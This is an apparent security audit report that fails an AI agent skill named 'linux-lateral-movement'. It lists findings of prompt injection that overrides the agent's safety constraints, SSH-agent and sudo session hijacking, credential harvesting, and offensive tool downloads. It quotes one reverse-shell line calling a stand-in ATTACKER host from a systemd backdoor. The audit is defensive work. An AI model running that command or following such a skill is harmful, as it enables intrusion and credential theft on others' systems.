linux-lateral-movement
Fail
Audited by Gen Agent Trust Hub on Jul 21, 2026
Risk Level: HIGHPROMPT_INJECTIONCOMMAND_EXECUTIONDATA_EXFILTRATIONREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADS
Full Analysis
- [PROMPT_INJECTION]: The skill instructs the agent to act as an attacker for the purpose of lateral movement across Linux hosts, overriding standard safety constraints to facilitate unauthorized pivoting.
- [COMMAND_EXECUTION]: Provides detailed procedures and commands to hijack SSH agent sockets and active sudo sessions using ptrace, enabling unauthorized privilege escalation and identity assumption.
- [DATA_EXFILTRATION]: Guides the agent to harvest highly sensitive files, including password hashes from /etc/shadow, SSH private keys, and cleartext credentials found in command histories and configuration files.
- [REMOTE_CODE_EXECUTION]: Includes a configuration for a persistent systemd backdoor that executes a reverse shell command (bash -i >& /dev/tcp/ATTACKER/4444 0>&1) to grant remote access to an attacker.
- [EXTERNAL_DOWNLOADS]: Encourages the download and use of offensive security tools from untrusted GitHub repositories, such as chisel and sudo_inject, which are not verified or from trusted organizations.
Recommendations
- AI detected serious security threats
Audit Metadata